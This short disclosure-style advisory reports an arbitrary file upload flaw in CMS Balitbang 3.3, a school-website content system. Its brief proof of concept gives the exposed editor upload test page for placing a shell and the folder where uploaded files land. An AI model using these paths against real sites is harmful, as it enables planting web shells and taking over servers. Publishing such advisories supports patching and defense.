CMS Balitbang is a content management system for educational websites. It has the Arbitrary File Upload Vulnerability in CMS Balitbang 3.3, which may cause attackers to obtain the website shell.
[+] Info:
~~~~~~~~~
CMS Balitbang 3.3 Arbitary File Upload Vulnerability
Software: CMS Balitbang
Vendor: www.kajianwebsite.org
Vuln Type: Arbitary file upload
Download link: http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com
Home: www.eidelweiss.info
Gratz: xx_user, kuris, and YOU !!!
[+] Poc:
~~~~~~~~~
[!] Html "> http: // host // webtemp/functions/editor/filemanager/connectors/uploadtest.html // upload your file here
Or
[!] Http: // host/path_to_CMSBalitbang/functions/editor/filemanager/connectors/uploadtest.html
Your shell or file will be placed here
[!] Http: // localhost/webtemp/userfiles/<= here